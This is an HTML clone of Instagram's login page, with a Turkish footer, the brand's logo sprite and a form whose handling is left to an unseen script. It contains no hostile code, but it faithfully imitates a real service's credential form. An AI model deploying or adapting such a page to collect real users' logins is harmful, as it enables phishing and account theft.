<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        * {
            margin: 0;
            padding: 0;
        }
        .instagram-logo {
            background-position: 0 -130px;
            height: 51px;
            width: 175px;
            background-image: url(https://bit.ly/3v2LT17);
        }
        .facebook-logo {
            background-position: -414px -259px;
            background-image: url(https://bit.ly/3v2LT17);
            height: 16px;
            width: 16px;
        }
        .apple-store-logo {
            background-position: -132px -182px;
            height: 42px;
            width: 128px;
            background-image: url(https://bit.ly/3v2LT17);
        }
        .google-store-logo {
            background-position: 0 -182px;
            height: 42px;
            width: 130px;
            background-image: url(https://bit.ly/3v2LT17);
        }
    </style>
</head>
<body>
<div class="flex w-full h-screen">
    <div class="phone-side w-2/3 hidden sm:flex justify-center items-center bg-gray-50">
        <img src="../images/home-phones.png" alt="picture frame" class="absolute z-10">
        <div class="sliders absolute z-20 ml-24 mb-10">
            <img src="../images/screenshot1.png" class="slide active" alt="screenshot1">
            <img src="../images/screenshot2.png" class="slide" alt="screenshot2" style="display: none;">
            <img src="../images/screenshot3.png" class="slide" alt="screenshot3" style="display: none;">
            <img src="../images/screenshot4.png" class="slide" alt="screenshot4" style="display: none;">
        </div>
    </div> 
    <div class="login-side w-full bg-gray-50 flex flex-col justify-center items-center"> 
        <div class="bg-white border border-gray-300 w-80 py-8 flex items-center flex-col mb-3">
            <h1 class="bg-no-repeat instagram-logo"></h1>
            <form class="mt-8 w-64 flex flex-col" id="loginForm">
                <input autofocus
                    class="text-xs w-full mb-2 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none"
                    id="email" placeholder="Phone number, username, or email" type="text">
                <input autofocus
                    class="text-xs w-full mb-4 rounded border bg-gray-100 border-gray-300 px-2 py-2 focus:outline-none focus:border-gray-400 active:outline-none"
                    id="password" placeholder="Password" type="password">
                <button type="submit" class=" text-sm text-center bg-blue-300 text-white py-1 rounded font-medium">
                    Log In
                </button>
            </form>
            <div class="flex justify-evenly space-x-2 w-64 mt-4">
                <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
                <span class="flex-none uppercase text-xs text-gray-400 font-semibold">or</span>
                <span class="bg-gray-300 h-px flex-grow t-2 relative top-2"></span>
            </div>
            <button class="mt-4 flex">
                <div class="bg-no-repeat facebook-logo mr-1"></div>
                <span class="text-xs text-blue-900 font-semibold">Log in with Facebook</span>
            </button>
            <a class="text-xs text-blue-900 mt-4 cursor-pointer -mb-4">Forgot password?</a>
        </div>
        <div class="bg-white border border-gray-300 text-center w-80 py-4">
            <span class="text-sm">Don't have an account?</span>
            <a class="text-blue-500 text-sm font-semibold">Sign up</a>
        </div>
        <div class="mt-3 text-center">
            <span class="text-xs">Get the app</span>
            <div class="flex mt-3 space-x-2">
                <div class="bg-no-repeat apple-store-logo"></div>
                <div class="bg-no-repeat google-store-logo"></div>
            </div>
        </div>

    </div> 
</div>
<footer class="flex flex-col justify-center items-center mt-auto bg-gray-50">
    <div class="flex justify-center mt-5 text-xs text-gray-500">
        <div class="space-x-2 md:space-x-4 md:line-clamp-3">
            <a href="#" class="hover:underline">Meta</a>
            <a href="#" class="hover:underline">Hakkında</a>
            <a href="#" class="hover:underline">Blog</a>
            <a href="#" class="hover:underline">İş Fırsatları</a>
            <a href="#" class="hover:underline">Yardım</a>
            <a href="#" class="hover:underline">API</a>
            <a href="#" class="hover:underline">Gizlilik</a>
            <a href="#" class="hover:underline">Koşullar</a>
            <a href="#" class="hover:underline">Konumlar</a>
            <a href="#" class="hover:underline">Instagram Lite</a>
            <a href="#" class="hover:underline">Threads</a>
            <a href="#"  class="hover:underline">Kişi Yükleme ve Hesabı Olmayan Kişiler</a>
            <a href="#"  class="hover:underline">Meta Verified</a>
        </div>
    </div>
    <div class="mt-5 text-gray-500 text-xs">
        <a href="">Türkçe 
            <i class="fa-solid fa-angle-down"></i>
        </a>
        <span class="ml-5">© 2024 Instagram from Meta</span>
    </div>
</footer>
 <script src="../js/login.js"></script>
</body>
</html>